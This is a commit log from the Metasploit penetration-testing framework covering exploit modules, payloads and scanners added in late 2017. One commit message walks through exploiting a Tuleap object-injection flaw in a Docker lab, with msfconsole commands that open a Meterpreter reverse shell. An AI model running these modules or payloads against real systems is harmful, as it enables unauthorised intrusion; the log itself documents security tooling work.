Austin
1758ed93d4
Update dlink_850l_unauth_exec.rb
2017-11-04 11:42:49 -04:00
Austin
724c5fb963
finish
2017-11-04 11:41:07 -04:00
Austin
e783cb59ea
add "check" & msftidy
2017-11-04 08:53:50 -04:00
Austin
84599ed3fc
Update dlink_850l_unauth_exec.rb
2017-11-04 07:58:13 -04:00
Austin
cddec8ca6c
download creds, stores in loot.
2017-11-03 14:24:45 -04:00
Austin
32a75e9782
Update dlink_850l_unauth_exec.rb
2017-11-03 09:02:48 -04:00
Austin
705c1cc6a7
Redo Functions
2017-11-03 08:33:42 -04:00
Austin
8c0da8ea90
Update dlink_850l_unauth_exec.rb
2017-11-03 06:24:07 -04:00
Austin
af583e843c
Update dlink_850l_unauth_exec.rb
2017-11-03 06:21:59 -04:00
h00die
697031eb36
mysql UDF now multi
2017-11-03 05:26:05 -04:00
Austin
5b7d803f85
Update dlink_850l_unauth_exec.rb
2017-11-02 15:57:03 -04:00
Austin
429ac71a63
header
2017-11-02 15:53:45 -04:00
Austin
61a67efb82
annnd....it sucks
2017-11-02 15:53:09 -04:00
Spencer McIntyre
70033e2b94
Enable the payload handler by default
2017-11-02 12:31:54 -04:00
William Vu
a15b61a218
Fix #9160 , exploit method from TcpServer
...
It already starts the server and waits for us. This is what was called
when the module was still auxiliary.
2017-11-01 19:26:00 -05:00
William Vu
87934b8194
Convert tnftp_savefile from auxiliary to exploit
...
This has been a long time coming. Fixes #4109 .
2017-11-01 17:37:41 -05:00
William Vu
972f9c08eb
Land #9135 , peer print for jenkins_enum
2017-11-01 15:33:13 -05:00
William Vu
77181bcc9c
Prefer peer over rhost/rport
2017-11-01 15:32:32 -05:00
William Vu
0e66ca1dc0
Fix #3444/#4774, get_json_document over JSON.parse
...
Forgot to update these when I wrote new modules.
2017-11-01 15:05:49 -05:00
William Vu
7a09dcb408
Fix #9109 , HttpServer (TcpServer) backgrounding
2017-11-01 13:35:04 -05:00
William Vu
e3ac6b8dc2
Land #9109 , wp-mobile-detector upload and execute
2017-11-01 13:25:16 -05:00
William Vu
3847a68494
Clean up module
2017-11-01 13:23:32 -05:00
Jeffrey Martin
7a21cfdfa6
add cached sizes for ppce500v2
2017-11-01 13:08:15 -05:00
EgiX
0973bfb922
Update tuleap_rest_unserialize_exec.rb
2017-11-01 16:37:14 +01:00
EgiX
6985e1b940
Add module for CVE-2017-7411: Tuleap <= 9.6 Second-Order PHP Object Injection
...
This PR contains a module to exploit [CVE-2017-7411](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7411 ), a Second-Order PHP Object Injection vulnerability in Tuleap before version 9.7 that might allow authenticated users to execute arbitrary code with the permissions of the webserver. The module has been tested successfully with Tuleap versions 9.6, 8.19, and 8.8 deployed in a Docker container.
## Verification Steps
The quickest way to install an old version of Tuleap is through a Docker container. So install Docker on your system and go through the following steps:
1. Run `docker volume create --name tuleap`
2. Run `docker run -ti -e VIRTUAL_HOST=localhost -p 80:80 -p 443:443 -p 22:22 -v tuleap:/data enalean/tuleap-aio:9.6`
3. Run the following command in order to get the "Site admin password": `docker exec -ti <container_name> cat /data/root/.tuleap_passwd`
4. Go to `https://localhost/account/login.php ` and log in as the "admin" user
5. Go to `https://localhost/admin/register_admin.php?page=admin_creation ` and create a new user (NOT Restricted User)
6. Open a new browser session and log in as the newly created user
7. From this session go to `https://localhost/project/register.php ` and make a new project (let's name it "test")
8. Come back to the admin session, go to `https://localhost/admin/approve-pending.php ` and click on "Validate"
9. From the user session you can now browse to `https://localhost/projects/test/ ` and click on "Trackers" -> "Create a New Tracker"
10. Make a new tracker by choosing e.g. the "Bugs" template, fill all the fields and click on "Create"
11. Click on "Submit new artifact", fill all the fields and click on "Submit"
12. You can now test the MSF module by using the user account created at step n.5
NOTE: successful exploitation of this vulnerability requires an user account with permissions to submit a new Tracker artifact or access already existing artifacts, which means it might be exploited also by a "Restricted User".
## Demonstration
```
msf > use exploit/unix/webapp/tuleap_rest_unserialize_exec
msf exploit(tuleap_rest_unserialize_exec) > set RHOST localhost
msf exploit(tuleap_rest_unserialize_exec) > set USERNAME test
msf exploit(tuleap_rest_unserialize_exec) > set PASSWORD p4ssw0rd
msf exploit(tuleap_rest_unserialize_exec) > check
[*] Trying to login through the REST API...
[+] Login successful with test:p4ssw0rd
[*] Updating user preference with POP chain string...
[*] Retrieving the CSRF token for login...
[+] CSRF token: 089d56ffc3888c5bc90220f843f582aa
[+] Login successful with test:p4ssw0rd
[*] Triggering the POP chain...
[+] localhost:443 The target is vulnerable.
msf exploit(tuleap_rest_unserialize_exec) > set PAYLOAD php/meterpreter/reverse_tcp
msf exploit(tuleap_rest_unserialize_exec) > ifconfig docker0 | grep "inet:" | awk -F'[: ]+' '{ print $4 }'
msf exploit(tuleap_rest_unserialize_exec) > set LHOST 172.17.0.1
msf exploit(tuleap_rest_unserialize_exec) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Trying to login through the REST API...
[+] Login successful with test:p4ssw0rd
[*] Updating user preference with POP chain string...
[*] Retrieving the CSRF token for login...
[+] CSRF token: 01acd8380d98c587b37ddd75ba8ff6f7
[+] Login successful with test:p4ssw0rd
[*] Triggering the POP chain...
[*] Sending stage (33721 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:56572) at 2017-11-01 16:07:01 +0100
meterpreter > getuid
Server username: codendiadm (497)
```
2017-11-01 16:09:14 +01:00
lvarela-r7
c36184697c
Merge pull request #9150 from bcook-r7/runtimeerror
...
Fix several broken raise RuntimeError calls in error paths
2017-10-31 14:47:42 -05:00
Brent Cook
f1e6e7eed5
Land #9107 , add MinRID to complement MaxRID
2017-10-31 12:18:28 -05:00
Brent Cook
aa0ac57238
use implicit RuntimeError
2017-10-31 04:53:14 -05:00
Brent Cook
9389052f61
fix more broken RuntimeError calls
2017-10-31 04:45:19 -05:00
Brent Cook
56eb828cc5
add e500v2 payloads
2017-10-30 14:04:10 -05:00
Brent Cook
22f9626186
update sizes
2017-10-30 05:26:29 -05:00
RootUp
9c16da9c98
Update ibm_lotus_notes2.rb
2017-10-28 18:53:15 +05:30
Steven Patterson
b96fa690a9
Add brackets to print functions
2017-10-27 15:23:22 -04:00
sho-luv
587c9673c6
Added host and port to output
...
I added the host and port number to reporting when instances are found.
2017-10-27 09:34:49 -07:00
h00die
037c58d1f6
wp-mobile-detector udpates
2017-10-27 10:10:04 -04:00
Steven Patterson
8613852ee8
Add Mako Server v2.5 command injection module/docs
2017-10-26 23:29:11 -04:00
Jeffrey Martin
cd755b05d5
update powershell specs for rex-powershell 0.1.77
2017-10-26 15:03:10 -05:00
Jeffrey Martin
43b67fe80b
remove errant bracket, formatting update
2017-10-26 15:01:53 -05:00
Jeffrey Martin
f2cba8d920
Land #8933 , Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)
...
This restores the original PR
2017-10-25 16:29:11 -05:00
Jeffrey Martin
ca28abf2a2
Revert "Land #8933 , Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)"
...
This reverts commit 4999606b61
, reversing
changes made to 4274b76473
.
2017-10-25 16:19:14 -05:00
Jeffrey Martin
0a858cdaa9
Revert "fix my comments from #8933"
...
This reverts commit 02a2839577
.
2017-10-25 16:13:00 -05:00
Jeffrey Martin
02a2839577
fix my comments from #8933
2017-10-25 14:46:41 -05:00
Jeffrey Martin
4999606b61
Land #8933 , Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)
2017-10-25 12:44:04 -05:00
Jeffrey Martin
4274b76473
Land #9119 , Fix #8436 , allow session upgrading on meterpreter sessions
2017-10-25 10:26:27 -05:00
RootUp
80aba7264c
Update ibm_lotus_notes2.rb
2017-10-25 10:33:25 +05:30
Brent Cook
50c533a452
update cached sizes
2017-10-23 23:04:02 -05:00
mumbai
19859f834d
re-add payload
2017-10-23 10:20:19 -04:00
Maurice Popp
df14dc4452
autodetection fixing
2017-10-23 09:07:46 +02:00
h00die
cd35ae4661
Land #9106 negear dgn1000 unauth rce module
2017-10-22 22:18:53 -04:00
h00die
210f6f80b7
netgear1000dng cleanup
2017-10-22 22:17:40 -04:00
Austin
eff94be951
Update netgear_dgn1000_setup_unauth_exec.rb
2017-10-22 16:55:40 -04:00
Austin
6f37bbb1d6
fix EDB
2017-10-22 16:11:19 -04:00
Tim
ca4feb5136
fix session upgrading
2017-10-23 01:26:45 +08:00
Austin
c7e35f885b
add disc date
2017-10-21 20:13:25 -04:00
Austin
e0831c1053
hopefully fix header..?
2017-10-21 18:38:32 -04:00
Austin
8239d28323
fix header
2017-10-21 09:07:18 -04:00
h00die
cfd7761818
wp_mobile_detector rce
2017-10-20 23:19:58 -04:00
Austin
40e508f2ad
correct mistake
2017-10-20 22:26:54 -04:00
Austin
ac21567743
Fix requested changes
2017-10-20 22:17:04 -04:00
mumbai
8b8bebd782
remove payload
2017-10-20 20:27:15 -04:00
mumbai
b255ddf8d6
New NETGEAR module
2017-10-20 20:25:11 -04:00
Jon Hart
9658776adf
Land #9079 , adding @h00die's gopher scanner
2017-10-20 17:16:08 -07:00
mumbai
2f371c9784
Netgear MODULE UNAUTH
2017-10-20 20:15:36 -04:00
mumbai
2e376a1b6a
Merge remote-tracking branch 'upstream/master' into netgear_dgn1000_unauth_setup_exec
2017-10-20 20:13:29 -04:00
h00die
f250e15b6e
Land #9105 rename psh to polycom for name collision
2017-10-20 20:10:57 -04:00
h00die
fd028338e1
move psh to polycom so no more powershell name collision
2017-10-20 20:08:11 -04:00
h00die
5a6da487ab
Land #9043 two exploit modules for unitrends backup
2017-10-20 20:00:35 -04:00
h00die
5abdfe3e59
ueb9 style cleanup
2017-10-20 19:59:24 -04:00
caleBot
c26779ef54
fixed msftidy issues
2017-10-20 14:39:39 -06:00
caleBot
8f622a5003
Update ueb9_bpserverd.rb
2017-10-20 14:35:03 -06:00
caleBot
cce7bf3e19
Update ueb9_bpserverd.rb
2017-10-20 14:33:46 -06:00
Brent Cook
d715f53604
add MinRID to complement MaxRID, allowing continuing or starting from a higher value
...
from @lvarela-r7
2017-10-20 15:32:25 -05:00
caleBot
85152b5f1e
added check function
2017-10-20 14:28:52 -06:00
caleBot
e9ad5a7dca
Update ueb9_api_storage.rb
2017-10-20 14:05:15 -06:00
caleBot
16b6248943
Update ueb9_bpserverd.rb
2017-10-20 13:58:12 -06:00
caleBot
5c0bcd8f0a
Update ueb9_bpserverd.rb
2017-10-20 13:56:25 -06:00
caleBot
abc749e1e8
Update ueb9_api_storage.rb
2017-10-20 13:48:29 -06:00
caleBot
8febde8291
Update ueb9_api_storage.rb
2017-10-20 12:23:53 -06:00
Jon Hart
664e774a33
style/rubocop cleanup
2017-10-20 09:44:07 -07:00
Kent Gruber
7cd532c384
Change targetr to target to fix small typo bug on one failure
...
The target object seems to have a typo where it is referred to as
“targetr” which I’d guess isn’t exactly what we’d like to do in this
case. So, I’ve changed that to “target” in order to work.
So, I’ve simply fixed that small typo.
2017-10-19 19:55:58 -04:00
mumbai
04a24e531b
New module
2017-10-18 21:37:26 -04:00
Austin
7098372f58
Update shell_bind_tcp.rb
2017-10-17 19:33:10 -04:00
mumbai
858bb26b56
Adding python/shell_bind_tcp, for an avaialable option
2017-10-17 07:36:45 -04:00
William Vu
7e338fdd8c
Land #9086 , proxying fix for nessus_rest_login
2017-10-16 11:52:04 -05:00
William Vu
df8261990d
Land #9085 , proxying fix for pop3_login
2017-10-16 11:38:24 -05:00
Jeffrey Martin
b04f5bdf90
Land #9077 , Enhancing the functionality on the nodejs shell_reverse_tcp payload.
2017-10-16 10:49:17 -05:00
Hanno Heinrichs
9597157e26
Make nessus_rest_login scanner proxy-aware again
2017-10-14 11:16:41 +02:00
Hanno Heinrichs
f4ae2e6cdc
Make pop3_login scanner proxy-aware again
2017-10-14 11:05:54 +02:00
itsmeroy2012
9afc8b589c
Updating the payload sizes
2017-10-14 11:05:44 +05:30
Wei Chen
c67a5872cd
Land #9055 , Add exploit for Sync Breeze HTTP Server
...
Land #9055
2017-10-13 17:34:03 -05:00
Wei Chen
3a2c6128be
Support automatic targeting
2017-10-13 16:53:22 -05:00
h00die
a63c947768
gopher proto
2017-10-12 21:32:01 -04:00
Adam Cammack
9b219f42c5
Land #9029 , Fix Linux post module file assumptions
2017-10-12 17:56:40 -05:00
Adam Cammack
deb2d76678
Land #9058 , Add proxies back to smb_login
2017-10-12 17:31:45 -05:00
itsmeroy2012
a0abffb6c4
Adding functionality of StagerRetryWait and StagerRetryCount
2017-10-12 22:25:00 +05:30
itsmeroy2012
374c139d33
Increasing the functionality of the nodejs shell_reverse_tcp payload
2017-10-12 19:05:59 +05:30
bwatters-r7
294230c455
Land #8509 , add Winsxs bypass for UAC
2017-10-11 16:24:52 -05:00
Jeffrey Martin
cfaa34d2a4
more style cleanup for tomcat_jsp_upload_bypass
2017-10-11 15:53:35 -05:00
Jeffrey Martin
9885dc07f7
updates for style
2017-10-11 15:29:47 -05:00
Jeffrey Martin
1786634906
Land #9059 , Tomcat JSP Upload via PUT Bypass
2017-10-11 15:05:00 -05:00
Jeffrey Martin
b76c1f3647
remove invalid 'client' object reference in nodejs
...
fix #9063 by removing invalid object reference introduced in PR #8825
2017-10-11 11:09:28 -05:00
root
03e7797d6c
fixed msftidy errors and added documentation
2017-10-11 07:57:01 -04:00
h00die
e976a91b15
land #9053 RCE for rend micro imsva
2017-10-10 19:27:06 -04:00
Wei Chen
a4bc3ea3c2
Merge branch 'pr9032' into upstream-master
...
Land #9032 , Improve CVE-2017-8464 LNK exploit
Land #9032
2017-10-10 17:11:51 -05:00
William Vu
ab63caef7b
Land #9009 , Apache Optionsbleed module
2017-10-10 12:13:40 -05:00
Jeffrey Martin
57afc3b939
Land #9044 , Address generation issues with pure PSH payloads
2017-10-10 10:40:33 -05:00
RootUp
2b85eb17dd
Create ibm_lotus_notes2.rb
2017-10-10 12:22:06 +05:30
Mehmet Ince
fb16f1fbda
Disabling bind type payloads
2017-10-10 09:37:24 +03:00
peewpw
facc38cde1
set timeout for DELETE request
2017-10-09 21:53:31 -04:00
h00die
850aeda097
land #9052 RCE of Trend Micro OfficeScan
2017-10-09 20:46:30 -04:00
Pearce Barry
a3d47ea838
Land #8989 , IBM Lotus Notes DoS (CVE-2017-1129)
2017-10-09 19:37:59 -05:00
Pearce Barry
fd8b72ca66
Minor tweaks.
2017-10-09 17:02:24 -05:00
Hanno Heinrichs
15adb82b96
Make smb_login scanner proxy-aware again
2017-10-09 23:01:25 +02:00
Mehmet Ince
a2d32b460c
Fixing grammer issue
2017-10-09 22:31:13 +03:00
Mehmet Ince
c14c93d450
Integrate OfficeScan 11 exploitation and fix grammer issues
2017-10-09 22:11:42 +03:00
jakxx
ef282ea154
Sync Breeze HTTP Server v10.0.28 BOF
...
Added support for v10.0.28 to Sync Breeze BOF module
2017-10-09 13:50:24 -04:00
bwatters-r7
fc5ab96ad6
Merging to prep for testing
...
Merge branch 'master' of github.com:rapid7/metasploit-framework into upstream-master
2017-10-09 10:31:30 -05:00
bwatters-r7
7df18e378d
Fix conflicts in PR 8509 by mergeing to master
2017-10-09 10:30:21 -05:00
Martin Pizala
6d28a579f3
send_request_cgi instead of send_request_raw
2017-10-09 13:12:48 +02:00
peewpw
be8680ba3d
Create tomcat_jsp_upload_bypass.rb
...
Created a module for CVE-2017-12617 which uploads a jsp payload and executes it.
2017-10-08 21:48:47 -04:00
Mehmet Ince
395c82050b
Adding Trend Micro IMSVA Widget RCE
2017-10-08 18:15:32 +03:00
Mehmet Ince
79c9123261
Adding Trend Micro OfficeScan widget rce module
2017-10-08 17:54:18 +03:00
Martin Pizala
33ec3c3d69
Error handling and style
2017-10-08 13:51:16 +02:00
Martin Pizala
d8ff99b1f6
Change to ARCH_X64, remove python dependency
2017-10-08 13:51:07 +02:00
h00die
7a87e11767
land #8781 Utilize Rancher Server to exploit hosts
2017-10-07 13:04:34 -04:00
Maurice Popp
b7184e87c0
fixing a type
2017-10-07 14:16:01 +02:00
Maurice Popp
8d50c34e4b
codefixing
2017-10-07 14:06:58 +02:00
Martin Pizala
34d119be04
Payload space, error handling and style"
2017-10-07 01:12:24 +02:00
William Webb
d9e0d891a1
Land #9010 , Remove checks for hardcoded SYSTEM account name
2017-10-06 13:42:18 -05:00
h00die
7535fe255f
land #8736 RCE for orientdb
2017-10-06 14:35:42 -04:00
bwatters-r7
f996597bcf
update cached payload sizes
2017-10-06 13:19:00 -05:00
caleBot
752d21e11c
forgot a comma
2017-10-06 10:47:42 -06:00
caleBot
63e3892392
fixed issues identified by msftidy
2017-10-06 10:16:01 -06:00
caleBot
78e262eabd
fixed issues identified by msftidy
2017-10-06 10:15:30 -06:00
caleBot
36610b185b
initial commit for UEB9 exploits - CVE-2017-12477, CVE-2017-12478
2017-10-06 09:38:33 -06:00
Maurice Popp
770547269b
added documentation, and fixed 4 to 2 indentation
2017-10-06 15:39:25 +02:00
Brent Cook
c701a53def
Land #9018 , Add Bind Shell JCL Payload for z/OS
2017-10-05 17:24:50 -05:00
Brent Cook
7292ee24a2
Land #9027 , Cleanup revshell for zos
2017-10-05 17:20:01 -05:00
Brent Cook
4a745bd2cc
Land #8991 , post/windows/manage/persistence_exe: fix service creation
2017-10-05 17:04:58 -05:00
Brent Cook
9d2e8b1e4d
Land #8003 , Evasions for delivering nops/shellcode into memory
2017-10-05 16:44:36 -05:00
Brent Cook
b7e209a5f3
Land #9033 , Geolocate API update
2017-10-05 16:39:09 -05:00
Spencer McIntyre
e4d99a14b6
Fix EXITFUNC back to process for the RCE too
2017-10-05 11:38:08 -04:00
Spencer McIntyre
4729c885f1
Cleanup the CVE-2017-8464 LPE module
2017-10-05 11:10:37 -04:00
Spencer McIntyre
d0ebfa1950
Change the template technicque to work as an LPE
2017-10-05 10:30:28 -04:00
Spencer McIntyre
825ad940e6
Update the advanced option names and a typo
2017-10-05 10:16:31 -04:00
Spencer McIntyre
482ce005fd
Update the advanced option names and a typo
2017-10-05 10:11:00 -04:00
Pearce Barry
7400082fdb
Land #9040 , Add CVE and Vendor article URL to the denyall_waf_exec module
2017-10-04 09:12:48 -05:00
Mehmet Ince
110f3c9b4a
Add cve and vendor article to the denyall_waf_exec module
2017-10-04 12:11:58 +03:00
William Vu
10dafdcb12
Fix #9036 , broken refs in bypassuac_comhijack
...
Each ref needs to be an individual array.
2017-10-03 13:36:29 -05:00
ashish gahlot
9ff6efd3a3
Remove broken link
2017-10-02 20:43:55 +05:30
h00die
fc66683502
fixes #8928
2017-10-01 19:49:32 -04:00
Martin Pizala
e3326e1649
Use send_request_cgi instead of raw
2017-10-01 02:15:43 +02:00
Martin Pizala
701d628a1b
Features for selecting the target
2017-10-01 02:04:10 +02:00
Spencer McIntyre
f2f48cbc8f
Update the CVE-2017-8464 module
2017-09-30 18:25:16 -04:00
h00die
a676f600d6
fixes to more modules
2017-09-30 15:45:52 -04:00
h00die
8a49a639a0
check file exists before reading
2017-09-29 22:34:38 -04:00
h00die
7fc9be846a
bcoles suggestions
2017-09-29 20:29:30 -04:00
bigendiansmalls
8af2e5a7ee
Cleanup revshell for zos
...
remove unused code, extra comments
align code, etc. no functionality changes
2017-09-29 18:27:29 -05:00
bigendiansmalls
9ae8bdda1c
Added Bind Shell JCL Payload for mainframe
...
The bind shell is the companion payload to the reverse_shell_jcl
payload for the mainframe platform.
2017-09-29 16:52:36 -05:00
William Vu
9b75ef7c36
Land #8343 , qmail Shellshock module
2017-09-29 00:28:30 -05:00
William Vu
daedf0d904
Clean up module
2017-09-29 00:27:22 -05:00
h00die
6cc5324e5b
oe is all umlaut
2017-09-28 19:52:02 -04:00
Martin Pizala
3a1a437ac7
Rubocop Stlye
2017-09-28 23:53:45 +02:00
Martin Pizala
40c58e3017
Function for selecting the target host
2017-09-28 23:43:59 +02:00
Martin Pizala
cc98e80002
Change arch to ARCH_X64
2017-09-28 20:50:18 +02:00
h00die
2295146dcd
working optionsbleed module
2017-09-27 22:07:57 -04:00
h00die
997b831b52
implement regexes
2017-09-27 19:33:50 -04:00
Christian Mehlmauer
41e3895424
remove checks for hardcoded name
2017-09-27 07:41:06 +02:00
h00die
0649d0d356
wip optionsbleed
2017-09-26 22:09:07 -04:00
bwatters-r7
579342c4f6
Land #8955 , Fix error messages on telnet_encrypt_overflow.rb
2017-09-26 16:08:58 -05:00
bwatters-r7
66d6ac418a
Land #8978 , Add smb1 scanner
2017-09-26 16:06:41 -05:00
Brent Cook
cad36ee14e
Land #8952 , suhosin compatibility added to staged payload
2017-09-26 15:22:36 -05:00
William Vu
b10d6b8b63
Land #9001 , SSLVersion consolidation for modules
2017-09-25 15:53:18 -05:00
William Vu
98ae054b06
Land #8931 , Node.js debugger exploit
2017-09-25 14:00:13 -05:00
Brent Cook
7924667e51
appease alignists
2017-09-25 09:10:10 -05:00
Brent Cook
62ee4ed708
update modules to use inherited SSLVersion option
2017-09-25 09:03:22 -05:00
g0tmi1k
1ee590ac07
Move over to rex-powershell and version bump
...
Version bump for:
- https://github.com/rapid7/rex-powershell/pull/10
- https://github.com/rapid7/rex-powershell/pull/11
2017-09-25 13:45:06 +01:00
h00die
273d49bffd
Land #8891 login scanner for Inedo BuildMaster
2017-09-24 13:30:17 -04:00
h00die
4d1e51a0ff
Land #8906 RCE for supervisor
2017-09-24 08:03:30 -04:00
Jannis Pohl
48188e999e
post/windows/manage/persistence_exe: fix service creation
...
Fixes service creation when in post/windows/manage/persistence_exe
2017-09-23 23:48:50 +02:00
h00die
9528f279a5
cleaned up version, and docs
2017-09-23 10:51:52 -04:00
RootUp
e4f79879ba
Update and rename modules/auxiliary/dos/ibm_lotus_notes.rb to modules/auxiliary/dos/http/ibm_lotus_notes.rb
2017-09-23 18:27:50 +05:30
Pearce Barry
e8eeb784e4
Land #8960 , spelling/grammar fixes part 3
2017-09-22 18:51:31 -05:00
Pearce Barry
8de6fa79c1
Tweakz, yo.
2017-09-22 18:49:09 -05:00
Pearce Barry
d56fffcadf
Land #8974 , spelling/grammar fixes part 4. Finished.
2017-09-22 14:59:28 -05:00
Pearce Barry
f1be6b720b
Tweaky bits.
2017-09-22 13:38:06 -05:00
RootUp
669b6771e3
Update ibm_lotus_notes.rb
2017-09-22 17:16:42 +05:30
RootUp
a71edb33be
Create ibm_lotus_notes.rb
2017-09-22 17:08:05 +05:30
h00die
ddbff6ba3c
Land #8980 unauth RCE for denyAll WAF
2017-09-21 21:41:33 -04:00
Mehmet Ince
3d543b75f5
Fixing typos and replacing double quotes with single
2017-09-21 23:48:12 +03:00
Mehmet Ince
1031d7960a
Moving token extraction to the seperated function
2017-09-20 10:23:32 +03:00
bwatters-r7
5a62e779aa
Land #8954 , fix internal usage of bindata objects when generating NTP messages
2017-09-19 09:01:49 -05:00
Mehmet Ince
ee969ae8e5
Adding DenyAll RCE module
2017-09-19 14:53:37 +03:00
loftwing
c953842c96
Added docs and additional dialects
2017-09-18 15:02:38 -05:00
loftwing
7d07f7054d
Merge remote-tracking branch 'origin/master' into add_smb1_scanner
2017-09-18 13:16:06 -05:00
loftwing
d07fe2f1e7
Added reporting back, removed wfw dialect
2017-09-18 13:15:19 -05:00
h00die
08dea910e1
pbarry-r7 comments
2017-09-17 19:38:43 -04:00
h00die
c90f885938
Finished spelling issues
2017-09-17 16:00:04 -04:00
William Webb
d5362333e2
Land #8958 , Add Disk Pulse Enterprise web server buffer overflow
2017-09-15 13:34:22 -05:00
loftwing
6f5eb5a18f
update
2017-09-15 12:07:28 -05:00
Pearce Barry
e651bc1205
Land #8951 , Hwbridge auto padding fix and flowcontrol
2017-09-15 08:33:17 -05:00
james
4e81a68108
Simplify saving valid credentials by calling store_valid_credential
2017-09-15 00:18:33 -05:00
loftwing
e88b766276
Merge branch 'master' of https://github.com/rapid7/metasploit-framework into add_smb1_scanner
2017-09-14 17:00:45 -05:00
loftwing
646dda7958
Add initial smbv1 scanner code
2017-09-14 16:59:39 -05:00
Christian Mehlmauer
c77cb51d64
add newline
2017-09-14 18:26:11 +02:00
Jeffrey Martin
a992a3c427
Land #8774 , Post module for gather Docker credentials
2017-09-14 10:15:03 -05:00
Pearce Barry
200a1b400a
Remove spaces to appease msftidy.
2017-09-14 09:28:38 -05:00
h00die
30f833f684
80 pages left
2017-09-13 22:03:34 -04:00
loftwing
52385f4d9e
fix formatting to fit rubocop
2017-09-13 11:46:57 -05:00
loftwing
b8c40a9d95
Clean up formatting
2017-09-13 11:13:33 -05:00
loftwing
3c204f91ef
Correct module title
2017-09-13 11:02:13 -05:00
loftwing
65f2ee9109
added generate_seh_record
2017-09-13 10:56:32 -05:00
loftwing
7db506887b
Add exploit code
2017-09-13 10:36:36 -05:00
loftwing
eb0d174987
Add disk_pulse_enterprise_get module
2017-09-13 10:19:24 -05:00
William Webb
a07f7c9f42
Land #8520 , Linux post module to find and collect TOR hidden service configurations
2017-09-12 13:39:18 -05:00
Erik Lenoir
27a517e0f6
Fix #8060 , cf #8061
2017-09-12 18:41:51 +02:00
Brent Cook
a7a17c677c
fix internal usage of bindata objects when generating NTP messages
2017-09-12 09:54:09 -04:00
Anant Shrivastava
86726978ed
payload size updated
2017-09-12 19:23:31 +05:30
Craig Smith
e4465c9350
Fixed a bug where flowcontrol caused the first packet to get lost
2017-09-11 19:00:53 -07:00
Craig Smith
b218cc3c7f
Merge branch 'master' into hw_auto_padding_fix
2017-09-11 18:30:34 -07:00
Craig Smith
ad9329993d
Added better padding and flowcontrol support.
2017-09-11 18:20:57 -07:00
Pearce Barry
7b87915e1f
Land #8923 , Add additional error checking to mssql_clr_payload module
2017-09-11 17:39:33 -05:00
Jeffrey Martin
a58552daad
Land #8825 , Handle missing util.pump in nodejs shell payloads
2017-09-11 15:32:21 -05:00
Tod Beardsley
5f66b7eb1a
Land #8940 , @h00die's second round of desc fixes
...
One ninja edit along the way as well.
2017-09-11 13:05:13 -05:00
Tod Beardsley
cfbd3c1615
Fix spelling of Honeywell
2017-09-11 13:02:18 -05:00
james
ba880d1a85
Changes to mssql_clr_payload error handling based on code review
2017-09-10 14:15:39 -05:00
Patrick Thomas
2966fb7c8c
Accept @shawizard suggestion for formatting msg_body
2017-09-10 11:23:52 -07:00
james
861f4a6201
Changes to buildmaster_login from code review
...
Use peer property in messages instead of rhost rport combination for consistency.
Documentation updated accordingly.
2017-09-09 18:00:04 -05:00
james
47adfb9956
Fixes from code review to buildmaster_login
...
Per bcoles, the most important fixes are:
- Removing `self.class` from call to `register_options`
- Adding rescue to login_succeeded to handle bad json
2017-09-09 16:26:01 -05:00
h00die
7339658ba9
224 pages of spelling issues left
2017-09-09 09:52:08 -04:00
h00die
6289cc0b70
Merge branch 'spellin' of https://github.com/h00die/metasploit-framework into spellin
2017-09-08 22:20:39 -04:00
h00die
0910c482a9
35 pages of spelling done
2017-09-08 22:19:55 -04:00
Brent Cook
8f864c27e3
Land #8924 , Add Apache Struts 2 REST Plugin XStream RCE
2017-09-08 13:59:52 -05:00
Brent Cook
54a62976f8
update versions and add quick module docs
2017-09-08 13:59:29 -05:00
William Vu
978fdb07b0
Comment out PSH target and explain why
...
I hope we can fix the PSH target in the future, but the Windows dropper
works today, and you can specify a custom EXE if you really want.
2017-09-08 13:41:06 -05:00
dmohanty-r7
c91ef1f092
Land #8768 , Add Docker Daemon TCP exploit module
2017-09-08 12:50:00 -05:00
Pearce Barry
2ebf53b647
Minor tweaks...
2017-09-08 10:04:47 -05:00
h00die
00c593e0a2
55 pages of spelling done
2017-09-07 21:18:50 -04:00
William Vu
a9a307540f
Assign cmd to entire case and use encode for XML
...
Hat tip @acammack-r7. Forgot about that first syntax!
2017-09-07 19:36:08 -05:00
William Vu
8f1e353b6e
Add Apache Struts 2 REST Plugin XStream RCE
2017-09-07 19:30:48 -05:00
Brent Cook
a0181a4d54
Land #8831 , Add Maven post-exploitation credential extraction module
...
Merge remote-tracking branch 'upstream/pr/8831' into upstream-master
2017-09-08 00:37:03 +02:00
James Barnett
7e9d0b3e9b
Fix permissions in docker priv_esc module
...
The previous command didn't give the original user enough permissions
to execute the payload. This was resulting in permission denied
and preventing me from getting a root shell.
Fixes #8937
2017-09-07 16:48:02 -05:00
Brent Cook
c67e407c9c
Land #8880 , added Cisco Smart Install (SMI) scanner
2017-09-07 08:06:03 -05:00
g0tmi1k
accb77d268
Add PSH (Binary) as a target to web_delivery
2017-09-07 10:55:29 +01:00
Brent Cook
9877a61eff
bump payloads
2017-09-07 01:36:25 -05:00
OJ
816e78b6f6
First pass of named pipe code for pivots
2017-09-07 01:33:53 -05:00
Patrick Thomas
5d009c8d0b
remove dead code
2017-09-06 23:21:56 -07:00
Patrick Thomas
048316864c
remove redundant return
2017-09-06 23:01:13 -07:00
Patrick Thomas
97d08e0da4
fix reviewer comments
2017-09-06 22:53:02 -07:00
Patrick Thomas
d71f7876b8
initial commit of nodejs debugger eval exploit
2017-09-06 22:29:24 -07:00
g0tmi1k
96f7012fe7
Code clean up (URLs, ordering and printing)
2017-09-06 13:17:28 +01:00
g0tmi1k
b884705a93
regsvr32_applocker_bypass_server -> web_delivery
2017-09-06 12:35:52 +01:00
g0tmi1k
e7b4cb71b1
Add PSH-Proxy to multi/script/web_delivery
2017-09-06 12:27:04 +01:00
h00die
be66ed8af3
Land #8788 exploits for Gh0st and PlugX malware controllers
2017-09-05 20:42:07 -04:00
james
44fb059cea
Add error checking to mssql_clr_payload
...
Additional error checking had been added to exploits/windows/mssql/mssql_clr_payload
If an error is encountered when changing the trustworthy or clr setting, the exploit fails with a message.
2017-09-05 18:48:22 -05:00
Adam Cammack
b0dc44fb86
Land #8909 , Avoid saving some invalid creds
2017-09-05 12:43:03 -05:00
h00die
d05c401866
modules cleanup and add docs
